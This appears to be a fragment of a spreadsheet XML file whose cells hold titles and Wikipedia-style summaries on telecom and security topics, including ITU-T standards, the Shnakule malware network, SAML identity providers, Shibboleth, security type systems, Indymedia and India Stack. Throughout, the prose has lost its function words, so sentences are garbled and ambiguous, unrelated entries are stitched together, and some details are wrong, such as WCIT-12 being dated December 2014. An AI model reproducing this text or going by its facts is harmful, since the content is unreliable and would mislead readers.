communication telephone network, v-series standards t.4, t.30, t.37, t.38 f.780.2 g.114 recommendation addresses acceptable delays voice applications, oriented national telecommunications, stringent normally applied private voice networks. issues addresses voice delay. states milliseconds acceptable, milliseconds unacceptable. g.191: software tools speech audio coding standardization g.651.1 multi-mode optical fiber (mmf) g.652, g.655, g.657 single-mode optical fiber (smf) g.8201 error performance parameters objectives multi-operator international paths within optical transport networks g.hn (next generation wired home networking powerlines, phonelines coaxial cable) green standards supplements (l.1000 series) h.323 family standards multimedia voip h.870 safe listening standard (audio) developed together world health organization interconnection rate harmonization, d-series international emergency preference scheme e.106 international telecommunication charge card e.118 imsi codes used cards e.212 isdn pstn/3g videoconferencing systems, h.320 h.324 isdn (integrated services digital network) q.931 objective voice quality measurements p.861, p.862, p.863 open systems interconnection optical transport network (otn) g.709, g.798, g.872 passive optical networks (pon) g.983, g.984, g.987 public infrastructure (pki) x.509 public telecommunication numbering plan, e.164 security framework x.805 signalling system q.7xx series standards relating quality service (qos) specification description language synchronous digital hierarchy (sdh) g.707, g.783, g.803 t.192, cooperative document handling wavelength-division multiplexing (wdm) x.25, packet switching x.400 email y.3800 quantum distribution (x)dsl (digital subscriber line) series standards broadband telecoms g.8013/y.1731 operations, administration maintenance (oam) functions mechanisms ethernet-based networks machine learning future networks (imt2020): y.3172 y.3173 y.3176 y.3181 international telecommunication regulations (itrs) addition itu-t recommendations, non-mandatory status unless adopted national laws, itu-t also custodian binding international treaty, international telecommunication regulations. itrs back earliest days separate treaties, dealing telegraph telephone. itrs adopted, single treaty, world administrative telegraphy telephone conference held melbourne, 1988 (wattc-88).the itrs comprise articles deal, inter alia, definition international telecommunication services, cooperation countries national administrations, safety life priority telecommunications charging accounting principles. adoption itrs 1988 often taken start wider liberalization process international telecommunications, though countries, including united states united kingdom, made steps liberalize markets 1988.the constitution convention provides amendment itrs world conference international telecommunications (wcit). accordingly, 1998 began process review itrs; 2009 extensive preparations began conference, wcit-12. addition "regional preparatory meetings," secretariat developed "background briefs issues" expected discussed conference. convened former secretary-general hamadoun touré, conference, wcit-12, held dubai, united arab emirates, period 3–14 december 2014. good standardization sector also organizes good, united nations platform sustainable development artificial intelligence. topics itu-t expressed commitment "bridging standardization gap" disparities ability developing countries, relative developed ones, access, implement, contribute influence international standards. security standards roadmap developed assist development security standards bringing together information existing standards current standards work standards development organizations. next generation networks (ngn) concept takes consideration realities telecommunication industry characterized factors need converge optimize operating networks extraordinary expansion digital traffic (i.e., increasing demand multimedia services, mobility, etc.). newslog (february 2014). first kind publication features itu-t standards smart grid home networking. also radio regulations global standards collaboration itu-r recommendations itu-t recommendations world summit information society world standards references external links official website itu-t recommendations</t>
  </si>
  <si>
    <t>Shnakule</t>
  </si>
  <si>
    <t>shnakule biggest malware network existence. averages 2000 hosts many 4357. targets users visiting trusted sites routes malware using relays, exploits, payload servers. these continually shifted domains. references external links http://www.marqit.nl/newsitem/9534/</t>
  </si>
  <si>
    <t>Security token service</t>
  </si>
  <si>
    <t>security token service (sts) cross-platform open standard core component oasis group's ws-trust services single sign-on infrastructure framework specification.cf. within claims-based identity framework, secure token service responsible issuing, validating, renewing cancelling security tokens. tokens issued security token services used identify holder token services adhere ws-trust standard. security token service provides functionality openid, unlike openid patent encumbered. together rest ws-trust standard, security token service specification initially developed employees ibm, microsoft, nortel verisign. typical usage scenario involving service employs ws-trust, client requests access application, application authenticate client directly (for instance, validating client's login credentials internal database). instead, application redirects client security token service, turn authenticates client grants security token. token consists data records include multiple elements regarding identity group membership client, well information regarding lifetime token issuer token. token protected manipulation strong cryptography. client presents token application gain access resources provided application. this process illustrated security assertion markup language (saml) case, demonstrating single sign-on used access services. software provides security token services available numerous vendors, including open-source apache cxf, well closed-source solutions oracle (for interfacing authentication services backed oracle database) microsoft (where core component windows identity foundation active directory federation services). while security token services typically offered services used conjunction services, software development kits (sdks) native applications (such cloud-storage clients) also exist. also access control service relying party identity provider references</t>
  </si>
  <si>
    <t>IViz Security</t>
  </si>
  <si>
    <t>iviz security information security company on-demand application penetration testing proactive security audit risk management compliance standards sox, pci, hipaa 27001:2005. company founded bikash barai nilanjan 2005 funded ventures. company acquired cigital 2014. software service (saas) offerings application penetration testing network system penetration testing payment card industry (pci) scan compliance reporting mobile application security testing references us-based security firm cigital acquires bangalore-based firm iviz security power ideas: iviz draws human psychology provide network protection your antivirus door hackers: iviz "green cloud security" discovers vulnerabilities avg, sophos, f-secure etc. iviz discovers vulnerabilities anti-virus software your antivirus door hackers protecting security guards computer networks nasscom showcase emerging product companies[nasscom_emerge_50] iviz, global security challenge(gsc) semi-finalist 2007 raises $2.5m bringing total alumni million nasscom emerge listing announced.. india's hottest start-ups external links official website cigital acquires iviz security best ever security services</t>
  </si>
  <si>
    <t>IWar</t>
  </si>
  <si>
    <t>iwar term used nato describe form internet-based warfare. iwar comparisons iwar distinct that, information warfare pertains issues intelligence. whereas cyber-warfare cyber-terrorism, pertain issues extelligence. these refer degrees sensitivity military infrastructure assets, battlefield communications satellite tactical assessments. iwar refers attacks carried internet, target specific assets within internet superstructure, example: websites provide access online services. iwar attack iwar example conducted denial-of-service attacks, using high volume bombardment information requests, bottlenecking internet based computer networking. future trends increasing vulnerability internet ease attack make conflagration iwar probable. 2008 russia-georgian conflict 2008 south ossetia heralded arrival iwar. also references further reading wang, xiangsui (2002). unrestricted warfare: china's master plan destroy america. american publishing company. isbn 978-0-9716807-2-2 external links information warfare site institute advanced study information warfare (iasiw)</t>
  </si>
  <si>
    <t>Ian Goldberg</t>
  </si>
  <si>
    <t>avrum goldberg (born march 1973) cryptographer cypherpunk. best known breaking netscape's implementation (with david wagner), role chief scientist radialpoint (formerly zero knowledge systems), canadian software company. goldberg currently professor faculty mathematics david cheriton school computer science within university waterloo, canada research chair privacy enhancing technologies. formerly project board directors chairman, designers record messaging. education attended high school university toronto schools, graduating 1991. 1995, received b.math university waterloo pure mathematics computer science. obtained ph.d. university california, berkeley december 2000. thesis entitled pseudonymous communications infrastructure internet. advisor eric brewer. accomplishments high school student, goldberg member canada's team international math olympiad 1989 1991, received bronze, silver, gold medal respectively. also member university waterloo team international collegiate programming contest 1994. 1998, wired magazine chose member "wired 25". 2011 pioneer award. 2019, usenix security test time award along colleagues david wagner randi thomas former supervisor eric brewer. work cryptography 1995, goldberg david wagner discovered flaw random number generator used temporary generation implementation netscape navigator.one first cryptanalyses wireless encryption protocol conducted goldberg nikita borisov david wagner, revealing serious flaws design.goldberg co-author off-the-record instant messaging encryption protocol. also author perl script included novel cryptonomicon neal stephenson.in 2009 goldberg co-author sphinx format, nowadays implemented extension per-hop payload increase privacy payer payee routing bitcoin payments lightning network.vitalik buterin, co-founder ethereum, research assistant goldberg student university waterloo.goldberg member cryptography, security privacy group well cybersecurity privacy institute (cpi). collaborating works development interdisciplinary research education program. also data privacy information privacy list university waterloo people notes references external links university waterlooian goldberg david cheriton school computer science goldberg's publications goldberg's website cypherpunks.cauc berkeleyian goldberg's website university california, berkeley experience with wingman: proxy-based graphical browser 3com palmpilot wingman: browser created palm pilot barwan research project, berkeley (1995-1998) isaac research group, berkeley (1996-2005)</t>
  </si>
  <si>
    <t>Identity provider (SAML)</t>
  </si>
  <si>
    <t>saml identity provider system entity issues authentication assertions conjunction single sign-on (sso) profile security assertion markup language (saml). saml domain model, saml authority system entity issues saml assertions. important examples saml authorities authentication authority attribute authority. definition saml authentication authority system entity produces saml authentication assertions. likewise saml attribute authority system entity produces saml attribute assertions. saml authentication authority participates profiles saml called saml identity provider simply identity provider domain understood). example, authentication authority participates saml browser identity provider performs following essential tasks: receives saml authentication request relying party browser authenticates browser user principal responds relying party saml authentication assertion principalin previous example, relying party receives accepts authentication assertion called saml service provider. given saml identity provider described &lt;md:idpssodescriptor&gt; element defined saml metadata schema. likewise saml service provider described &lt;md:spssodescriptor&gt; metadata element. addition authentication assertion, saml identity provider also include attribute assertion response. case, identity provider functions authentication authority attribute authority. also identity provider security assertion markup language (saml) saml service provider saml-based products services references</t>
  </si>
  <si>
    <t>IceWall SSO</t>
  </si>
  <si>
    <t>icewall federated single sign-on software developed marketed hewlett packard enterprise globe. overview released 1997, icewall evolved last years.originally developed japan marketed global markets, provides highly convenient comfortable highly secure environment. since first release 1997, icewall seen adoption intranet, b-to-c, b-to-b, many services globally million user licenses sold world. latest version, icewall 10.0, provides support leading-edge technologies cloud virtualization, icewall product line extended include windows support addition existing hp-ux linux versions. furthermore, support services icewall planned continue 2024, making product long stable service life latest version available 10.0. august 2010) supported platforms enterprise linux, hp-ux windows server. icewall mainly reverse proxy type implementation, configured work agent type well depending requirements. architecture icewall mainly consists modules. forwardera process works reverse proxy. accepts http/https requests browser forwards backend applications. forwarder also handles loginprocess authorizations communicating authentication module mentioned below. authentication modulea daemon program accepts requests forwarder performs authentication getting user information certification (directory services rdb). icp(icewall cert protocol) used forwarder authentication module. contemporary products access manager: novell access manager: oracle siteminder: technologies tivoli access manager (tam): websam securemaster: also hewlett-packard japan single sign-on references</t>
  </si>
  <si>
    <t>Security+</t>
  </si>
  <si>
    <t>Identity Governance Framework</t>
  </si>
  <si>
    <t>identity governance framework project liberty alliance standards help enterprises determine control identity information used, stored, propagated using protocols ldap, saml, ws-trust id-wsf. purpose identity governance framework (igf) enables organizations define policies regulate control exchange identity information application systems internally external partners. identity information include things like names, addresses, social security numbers information would otherwise considered related individual's identity. policy information useful privacy auditors assessing identity information applications policy enforcement systems ensuring appropriate identity information takes place. history originally announced oracle november, 2006 joint initiative layer technologies, novell, oracle, ping identity, securent, microsystems. february, 2007, initiative transferred liberty alliance take draft proposal forward fully develop standard. july, 2007, liberty announced completion market requirements case documentation. june, 2008, liberty alliance announced publication draft specifications carml privacy constraints. november, 2008, project aristotle announced release arisid implementing draft specifications igf. project information. november, 2009, liberty alliance published final specifications components carml (client attribute requirements markup language) privacy constraints. december, 2009, project aristotle published arisid, implementation release 1.1. liberty alliance published final specifications components carml (client attribute requirements markup language) privacy constraints fall 2009. ongoing standards work handled kantara initiative, working group implementation carml privacy constraints available project aristotle, apache licensed open source project. release released december 2009. external links liberty alliance identity governance strategic initiative openliberty project aristotle oracle technology network page further reading sarbanes-oxley compliance journal january 2007 open initiative help organizations govern identity information across enterprise applications network world july 2007 identity governance framework sprints finish line sarbanes-oxley compliance journal january 2008 identity governance framework liberty alliance's initiative addressing privacy zdnet dana blankenhorn blog november 2008 will identity open source?</t>
  </si>
  <si>
    <t>Identity Management</t>
  </si>
  <si>
    <t>Shibboleth (software)</t>
  </si>
  <si>
    <t>shibboleth single sign-on log-in system computer networks internet. allows people sign using identity various systems federations different organizations institutions. federations often universities public service organizations. shibboleth internet2 middleware initiative created architecture open-source implementation identity management federated identity-based authentication authorization access control) infrastructure based security assertion markup language (saml). federated identity allows sharing information users security domain organizations federation. this allows cross-domain single sign-on removes need content providers maintain user names passwords. identity providers (idps) supply user information, service providers (sps) consume information give access secure content. history shibboleth project grew internet2. today, project managed shibboleth consortium. popular software components managed shibboleth consortium shibboleth identity provider shibboleth service provider, implementations saml. project named identifying passphrase used bible (judges 12:4–6) ephraimites able pronounce "sh". shibboleth project started 2000 facilitate sharing resources organizations incompatible authentication authorization infrastructures. architectural work performed year prior software development. after development testing, shibboleth released july 2003. this followed release shibboleth august 2005. version shibboleth software major upgrade released march 2008. included components, but, importantly, shibboleth supported saml 2.0. shibboleth saml protocols developed timeframe. from beginning, shibboleth based saml, but, saml found lacking, shibboleth improvised, shibboleth developers implemented features compensated missing features saml 1.1. some features later incorporated saml 2.0, and, sense, shibboleth contributed evolution saml protocol. perhaps important contributed feature legacy shibboleth authnrequest protocol. since saml protocol inherently idp-first protocol, shibboleth invented simple http-based authentication request protocol turned saml sp-first protocol. this protocol first implemented shibboleth later refined shibboleth 1.3. building early work, liberty alliance introduced fully expanded authnrequest protocol liberty identity federation framework. eventually, liberty id-ff contributed oasis, formed basis oasis saml standard. architecture shibboleth web-based technology implements http/post artifact attribute push profiles saml, including identity provider (idp) service provider (sp) components. shibboleth technical overview, architectural document, conformance document build saml specifications. shibboleth canonical case: user first accesses resource hosted server (the service provider) shibboleth content protection enabled. crafts proprietary authentication request passed browser using query parameters supply requester's saml entityid, assertion consumption location, optionally page return user user redirected either home wayf (where from) service, select home redirection. user authenticates access control mechanism external shibboleth. shibboleth generates saml authentication assertion temporary "handle" contained within this handle allows recognize request particular browser user corresponding principal authenticated earlier. user posted assertion consumer service consumes assertion issues attributequery idp's attribute service attributes user, include user's identity. sends attribute assertion containing trusted information user either makes access control decision based attributes supplies information applications make decisions themselves.shibboleth supports number variations base case, including portal-style flows whereby mints unsolicited assertion delivered initial access lazy session initiation, allows application trigger content protection method choice required. shibboleth earlier provide built-in authentication mechanism, web-based authentication mechanism used supply user data shibboleth use. common systems purpose include pubcookie. authentication single-sign-on features java container runs (tomcat, example) also used. shibboleth shibboleth builds saml standards. shibboleth additional processing order support passive forced authentication requests saml 2.0. request specific method authentication idp. shibboleth supports additional encryption capacity. attributes shibboleth's access control performed matching attributes supplied idps rules defined sps. attribute piece information user, "member community", "alice smith", "licensed contract user identity considered attribute, passed explicitly required, preserves user privacy. attributes written java pulled directories databases. standard x.520 attributes commonly used, attributes arbitrarily defined long understood interpreted similarly transaction. trust trust domains implemented using public cryptography (often simply server certificates) metadata describes providers. information passed controlled agreements. federations often used simplify relationships aggregating large numbers providers agree common rules contracts. development shibboleth open-source provided apache license. many extensions contributed groups. adoption federations formed many countries around world build trust structures exchange information using saml shibboleth software. many major content providers support shibboleth-based access. february 2006, joint information systems committee (jisc) higher education funding councils england, scotland, wales northern ireland announced would move athens authentication system access-management system based shibboleth technology. since updated position endorsing federated access management solution rather shibboleth itself. also openathens references external links official website official shibboleth wiki official shibboleth wiki official shibboleth wiki official shibboleth wiki</t>
  </si>
  <si>
    <t>Identity driven networking</t>
  </si>
  <si>
    <t>identity driven networking (idn) process applying network controls network device access based identity individual group individuals responsible operating device. individuals identified, network tuned respond presence context. model provides method deliver network traffic, system application requested listening data. these applications operate either system based user-daemon process, user application browser. internet security built around idea ability request respond requests subjected degree authentication, validation, authorization, policy enforcement. identity driven networking endeavors resolve user system based policy single management paradigm. since internet comprises vast range devices applications also many boundaries therefore ideas resolve connectivity users within boundaries. endeavor overlay system identity framework must first decide identity determine existing controls decide intended information. identity digital identity represents connectedness real projection identity; incorporate references devices well resources policies. systems, policies provide entitlements identity claim particular point time space. example, person entitled privileges work workplace denied home hours. might work before user gets network usually form machine authentication, probably verifies configures system basic level access. short mapping user address prior process (802.1x) simple users authenticate point. usual user attempt authenticate system processes (daemons) started, well require network configuration already performed. follows that, principle, network identity device established permitting network connectivity, example using digital certificates place hardware addresses trivial spoof device identifiers. furthermore, consistent identity model account typical network devices routers switches can't depend user identity, since distinctive user associated device. absent capability practice, however, strong identity asserted network level. first task seeking apply identity driven network controls comprises form authentication, device level stack. since first piece infrastructure placed upon network often network operating system (nos) often identity authority controls resources contains (usually printers file shares). there also procedures authenticate users onto incorporating form single sign-on means flow effect controls seamless. many network capabilities made rely upon authentication technologies provisioning access control policy. instance; packet filtering -firewall, content-control software, quota management systems quality service (qos) systems good examples controls made dependent upon authentication. also protocols radius ldap references</t>
  </si>
  <si>
    <t>Identity interrogation</t>
  </si>
  <si>
    <t>identity interrogation method authentication identity proofing involves posing knowledge-based authentication questions individual. identity interrogation questions "what mother’s maiden name?" "what last four digits social security number?" method businesses prevent identity theft impersonation customers.identity interrogation primarily employed remote, in-person interactions, teller bank. many interactions require user authentication internet telephone employ identity interrogation substitute stronger authentication methods physical ownership authentication (i.e. presenting driver's license bankcard) biometrics (i.e. fingerprint facial recognition) available mainly in-person interactions. identity interrogation used assist risk management, account security, legal regulatory compliance remote interactions. addition, technique developed assist prevention identity fraud, illegal another person's identity commit fraud criminal activities.identity interrogation methods commonly used governments, organizations companies banks financial intermediaries, credit card companies, internet providers, telecommunications companies, insurance providers others. also trustid notes</t>
  </si>
  <si>
    <t>Identity management system</t>
  </si>
  <si>
    <t>Security type system</t>
  </si>
  <si>
    <t>computer science, type system described syntactic framework contains rules used assign type property (int, boolean, char etc.) various components computer program, variables functions. security type system works similar way, main focus security computer program, information flow control. thus, various components program assigned security types, labels. system ultimately able verify given program conforms type system rules satisfies non-interference. security type systems many security techniques used field language-based security, tightly connected information flow information flow policies. simple terms, security type system used detect exists kind violation confidentiality integrity program, i.e. programmer wants detect program line information flow policy not. simple information flow policy suppose users, program, following security classes (sc) introduced: {a}, {b}, {a,b}}, empty set.the information flow policy define direction information allowed flow, dependent whether policy allows read write operations. this example considers read operations (confidentiality). following flows allowed: {({a}, {a}), ({b}, {b}), ({a,b}, {a,b}), ({a,b}, {a}), ({a,b}, {b}), ({a}, ({b}, ({a,b}, ∅)}this also described superset (⊇). words: information allowed flow towards stricter levels confidentiality. combination operator express security classes perform read operations respect security classes. example: {a,b} security class read {a,b} {a}. neither allowed read {b}.this also described intersection security classes. information flow policy illustrated hasse diagram. policy also lattice, greatest lower-bound least upper-bound (there always exists combination security classes). case integrity, information flow opposite direction, thus policy inverted. information flow policy security type systems once policy place, software developer apply security classes program components. security type system usually combined compiler perform verification information flow according type system rules. sake simplicity, simple computer program, together information flow policy described previous section, used demonstration. simple program given following pseudocode: y{a} x{a,b} else x{a,b} here, equality check made variable assigned security class {a}. variable lower security class ({a,b}) influenced check. this means information leaking class class {a,b}, violation confidentiality policy. this leak detected security type system. example designing security type system requires function (also known security environment) creates mapping variables security types, classes. this function called γ(x) variable security class, type. security classes assigned (also called "judgement") program components, using following notation: types assigned read operations types assigned write operations cmd. constants assigned type.the following bottom-up notation used decompose program: assumption1 assumptionn/conclusion. once program decomposed trivial judgements, type easily determined, types less trivial parts program derived. each "numerator" considered isolation, looking type statement allowed type derived "denominator", based defined type system "rules". rules main part security type system rules. they program decomposed type verification performed. this program consists conditional test possible variable assignments. rules events defined follows: applying simple program introduced yields: type system detects policy violation line read operation security class performed, followed write operations less strict security class {a,b}. formalized terms, {a,b}, {a,b} (from rule conditional test). thus, program classified "not typeable". soundness soundness security type system informally defined program well typed, satisfies non-interference. references further reading dennis volpano, cynthia irvine, geoffrey smith, sound type system secure flow analysis, journal computer security, 4(2), 1996. fred schneider, greg morrisett, robert harper, language-based approach security. andrei sabelfeld, andrew myers, language-based information-flow security.</t>
  </si>
  <si>
    <t>Incognito (operating system)</t>
  </si>
  <si>
    <t>incognito linux distribution based gentoo linux. main feature inclusion anonymity security tools default able used live live usb.incognito's developer stated project's homepage incognito discontinued recommends tails alternative. release history anonymity security tools anonymous internet browsing. truecrypt, file/partition encryption utility. enigmail, security extension thunderbird. torbutton, firefox plugin improve tor's anonymity firefox. firegpg, firefox plugin using gnupg webmail. gnupg, openpgp implementation encryption. keepassx, password manager.besides tools, overwritten system shutdown ensure possibility data recovery later. license project listed incognito licensee brand name. accordance license agreement, incognito right name logo. references external links official website incognito softpedia tails, successor incognito</t>
  </si>
  <si>
    <t>Independent Media Center</t>
  </si>
  <si>
    <t>independent media center, better known indymedia, open publishing network activist journalist collectives report political social issues. following beginnings 1999 carnival against capital 1999 seattle protests, indymedia became closely associated global justice movement. indymedia network extended internationally early 2000s volunteer-run centers shared software common format newswire columns. police raided several centers seized computer equipment. centers declined 2010s waning global justice movement. content distribution indymedia website citizen journalism promotes activism counters mainstream media news commentary perspectives. indymedia originated protests concentrated ownership perceived biases corporate media reporting. first indymedia node, attached seattle anti-corporate globalization protests, seen activists alternative news source corporate media, accused showing violence confrontation, portraying protesters negatively. indymedia initially covered protests 1999 2001. protests began wane, indymedia covered global social justice movements, opposition iraq. indymedia purported first network on-the-scene reporting 2008 greek riots resistance towards 2009 honduran coup. network also focus covering social justice campaigns students, indigenous people, immigrants, peace activists. slogan "don't hate media, become media!": active, software used basis first indymedia center websites, written activists sydney. went live january 1999 featured open publishing, calendars, events contacts. indymedia also global radio project aggregated audio feeds around world. history origins indymedia traced global justice protest carnival against capital, took place forty countries june 1999. late november 1999, first dedicated indymedia project ready cover 1999 seattle protests. first post made november read: resistance global dramatically alters balance multinational activist media. with coding cheap equipment, live automated website rivals corporates'. prepare swamped tide activist media makers ground seattle around world, telling real story behind world trade agreement. when protests began, hundred videographers streets filming, joined photographers journalists, working volunteers.: after seattle, local, autonomous collectives formed. local sociopolitical context determined individual center's focus. however, core theme centers would open publishing structure anyone could contribute open archive.: centers tended response meetings groups world bank world forum events, party conventions, democrat republican meetings us.: 2002, indymedia websites, mainly canada western europe also australia, zealand latin america.: number centers continued growing, especially europe, reaching 2004 2010.: indymedia movement reached peak mid-2000s.: centers united states began atrophy around 2008, 2014, global network declined significantly, number active sites 68.: number reasons decline forward. february 2013, ceasefire magazine noted decline nottingham indymedia, stating activist usage commercial social media increased. poverty activist collectives invest resources contrasted massive investments made corporations facebook twitter. article published journal convergence giraud summarised different arguments made academics activists, included informal hierarchy, bureaucracy, security issues including address logging, lack regional engagement, lack class politics, increase social media use, website underdevelopment, decline volunteers decline global justice movement. corporate watch rise social media sites normalization 'open publishing' recommodifying indymedia's innovations cultural industry.in 2019 article published occasion indymedia's 20th anniversary, april glaser suggested factors volunteer burnout, lack resources, lack centralized accountability, lack leadership development, waning anti-globalization movement contributed decline indymedia. region united kingdom police seized servers june 2005. anonymous post bristol indymedia server came police attention suggesting "action" freight train carrying cars part protest cars climate change year's gleneagles summit. member bristol indymedia group arrested. indymedia supported matter national union journalists liberty.in august 2014, bristol indymedia's servers seized police arsonists used site claim responsibility fire firearms training centre. bristol indymedia stated would cooperate authorities intend voluntarily hand information police requested". united states october 2004, took possession several server hard drives used number imcs hosted us-based rackspace managed hosting. servers question located united kingdom managed british rackspace, mainly european websites affected, several unrelated websites affected, including website linux distribution. some, all, legal documents relating confiscation servers unsealed texas district court august 2005, following legal action electronic frontier foundation. documents revealed action requested government surrender server files.the move condemned international federation journalists, stated that, "the done smacks intimidation legitimate journalistic inquiry crime-busting" called investigation. european civil liberties organization statewatch world association community radio broadcasters (amarc) also voiced criticism. attorney kurt opsahl compared case steve jackson games, inc. united states secret service. york–based journalist indymedia volunteer bradley roland will killed october 2006 along mexican protesters city oaxaca. people demonstrating city since part uprising prompted teachers strike. reporters without borders condemned actions mexican government allowing accused gunmen free.on january 2009, system administrators server hosts indymedia.us received grand jury subpoena southern district indiana federal court. subpoena asked administrator provide addresses, times, identifying information" every visitor site june 2008. subpoena also included order stated recipient "not disclose existence request unless authorized assistant u.s. attorney." administrator indymedia.us could provided information indymedia sites generally keep address logs. electronic frontier foundation determined legal basis order, subpoena request "violated sca's restrictions types data government could obtain using subpoena." under justice department guidelines, subpoenas news media must authorization attorney general. according news blog, subpoena indymedia.us never submitted attorney general review. february 2009, united states attorney sent letter attorney electronic frontier foundation stating subpoena withdrawn. europe 2001 summit genoa, italian police assaulted indymedia journalists armando diaz school indymedia temporary office radio station. twenty-nine police officers indicted beating people, planting evidence wrongful arrest night-time raid. thirteen convicted.in aftermath 2017 hamburg summit protests, german federal ministry interior, building community banned chapter network called linksunten. this 2008, southwestern germany. ministry described network "the central communications platform among far-left extremists prone violence" stated used spread information violent protest tactics. german internet service providers ordered block communication website, police referred "pigs" "murderers" instructions making molotov cocktails could found. german police also raided home addresses several activists baden-württemberg region, seizing computers weapons. also free content localwiki schnews undercurrents (news) showdown seattle references advertise policy further reading external links official website</t>
  </si>
  <si>
    <t>India Stack</t>
  </si>
  <si>
    <t>india stack refers ambitious project creating unified software platform bring india's population digital age. website describes mission thus: "india stack apis allows governments, businesses, startups developers utilize unique digital infrastructure solve india’s hard problems towards presence-less, paperless, cashless service delivery" four "distinct technology layers" mentioned page, first, "presenceless layer" controversial involves storing biometric data fingerprints every citizen. since markers widely adopted enable cashless payment, issue arises fraudulent biometrics. layers paperless layer, enables personal records associated one's online identity; cashless layer, single interface national banks online wallets; consent layer, aims maintain security control personal data. india stack largest open world. since deployment, india organizing hackathons develop applications apis.india stack implemented stages, starting introduction 2009 aadhaar "universal numbers. these linked biometrics (fingerprints) time goes authentication aadhaar required access services subsidies. this raises issues privacy surveillance, especially much users' interface mobile phones.the next stages introduction ekyc (electronic know your customer), enables paperless rapid verification address, identity etc., followed e-sign, whereby users attach legally valid electronic signature document, (unified payments interface) enabling cashless payments, recently, digitallocker, platform issuance verification documents certificates. what raised profile aadhaar india stack worldwide recent "demonetisation" whereby 1000 rupee notes phased out, officially eliminate forgeries money-laundering, secondary objective hastening transition cashless economy. observers argued india stack could fast-track move digital payment systems across developed world mark cash. however, various challenges related user rights mounted: august 2017 india's supreme court unanimously ruled favour petition applying privacy declared fundamental right court matters followed. first pilot india stack test layers- presenceless, paperless, cashless consent- india stack, india stack team partnered largest fintech alternative credit company india, capital float 2016. objective pilot provide loans customers minutes comfort house. additionally, target customer someone collateral limited data trail. when user opened application, give consent capital float access his/ data digital platform (consent). once consent given capital float used aadhaar infrastructure authenticate users (presenceless). aadhaar also helped e-kyc, mandatory requirement loan activities india. once authentication complete, capital float pinged aadhaar data base check banking activity, also used mobile scraping technique gather data customer's phone. these steps helped capital float estimate credit-worthiness customer. once determined, customer application loan offers screen. customer could select offer e-signature within comforts home (paperless). this whole process could completed seconds. once loan approved could directly disbursed bank account customer (cashless). pull function platform could also utilized capital float back loan payments. after pilot, india stack team approached alternate lenders utilize platform give loans under-served populations. capital float already process expanding pilot full-fledged service offering. this pilot proved clear value proposition india stack platform fintech industry. also aadhaar unified payments interface payment gateway merchant account immediate payment service national payments corporation india references</t>
  </si>
  <si>
    <t>Information Trust Institute</t>
  </si>
  <si>
    <t>information trust institute (iti) founded 2004 interdisciplinary unit designed approach information security research systems perspective. examines information security looking makes machines, applications, users trustworthy. mission create computer systems, software, networks society depend trustworthy, meaning secure, dependable (reliable available), correct, safe, private, survivable. iti's stated goal create paradigm designing trustworthy systems ground validating systems intended trustworthy. participants academic/industry partnership focusing application areas electric power, financial systems, defense, homeland security, among others. brings together researchers representing numerous colleges units university illinois urbana–champaign. major centers within boeing trusted software center caesar: center autonomous engineering systems robotics center information forensics center health information privacy security center information assurance education research tcipg: trustworthy cyber infrastructure power grid center trusted illiac references https://www.wsj.com/articles/federal-researchers-simulate-power-grid-cyberattack-find-holes-in-response-plan-1541785202https://interestingengineering.com/11-schools-with-the-best-cybersecurity-degrees-in-the-worldhttps://www.scientificamerican.com/article/tracking-cyber-hackers/https://www.scientificamerican.com/article/fog-of-cyber-warfare/https://blog.slate.fr/globule-et-telescope/2011/06/14/le-jour-ou-des-hackers-pirateront-le-reseau-electrique/https://www.cioreview.com/news/quick-steps-to-trace-a-hacker-nid-18191-cid-9.htmlhttps://www.newsindiatimes.com/indian-american-recognized-for-developing-method-to-locate-power-grid-attackers/https://www.thewilkesbeacon.com/news/2018/09/20/profile-of-a-professor-dr-jane-blanken-webb-education/ external links information trust institute university illinois urbana–champaign</t>
  </si>
  <si>
    <t>Information assurance vulnerability alert</t>
  </si>
  <si>
    <t>information assurance vulnerability alert (iava) announcement computer application software operating system vulnerability notification form alerts, bulletins, technical advisories identified us-cert, https://www.us-cert.gov/ us-cert managed national cybersecurity communications integration center (nccic), part cybersecurity infrastructure security agency (cisa), within u.s. department homeland security (dhs). cisa, includes national cybersecurity communications integration center (nccic) realigned organizational structure 2017, integrating like functions previously performed independently u.s. computer emergency readiness team (us-cert) industrial control systems cyber emergency response team (ics-cert). these selected vulnerabilities mandated baseline, minimum configuration hosts residing gig. us-cert analyzes vulnerability determines necessary beneficial department defense release iava. implementation iava policy help ensure components take appropriate mitigating actions vulnerabilities avoid serious compromises computer system assets would potentially degrade mission performance. information assurance vulnerability management (iavm) program combatant commands, services, agencies field activities required implement vulnerability notifications form alerts, bulletins, technical advisories. uscybercom authority direct corrective actions, ultimately include disconnection enclave, affected system enclave, compliance iava program directives vulnerability response measures (i.e. communication tasking orders messages). uscybercom coordinate affected organizations determine operational impact instituting disconnection. background november 2018, president trump signed cybersecurity infrastructure security agency 2018. this landmark legislation elevated mission former national protection programs directorate (nppd) within department homeland security (dhs) established cisa, includes national cybersecurity communications integration center (nccic). nccic realigned organizational structure 2017, integrating like functions previously performed independently u.s. computer emergency readiness team (us-cert) industrial control systems cyber emergency response team (ics-cert). according memorandum, alert system should: identify system administrator point contact relevant network system, send alert notifications point contact, require confirmation point contact acknowledging receipt alert notification, establish date corrective action implemented, enable disa confirm whether correction implemented.the deputy secretary defense issued information assurance vulnerability alert (iava) policy memorandum december 1999. current events time demonstrated widely known vulnerabilities exist throughout networks, potential severely degrade mission performance. policy memorandum instructs disa develop maintain iava database system would ensure positive control mechanism system administrators receive, acknowledge, comply system vulnerability alert notifications. iava policy requires component commands, services, agencies register report acknowledgement compliance iava database. according policy memorandum, compliance data reported include number assets affected, number assets compliance, number assets waivers. also attack (computing) computer security information security risk threat (computer) vulnerability (computing) security technical implementation guide security content automation protocol external links office inspector general, compliance information assurance vulnerability alert policy, 2001. chairman joint chiefs staff instruction, 6510.01e, august 2007. policy chart policy chart iava site</t>
  </si>
  <si>
    <t>Information card</t>
  </si>
  <si>
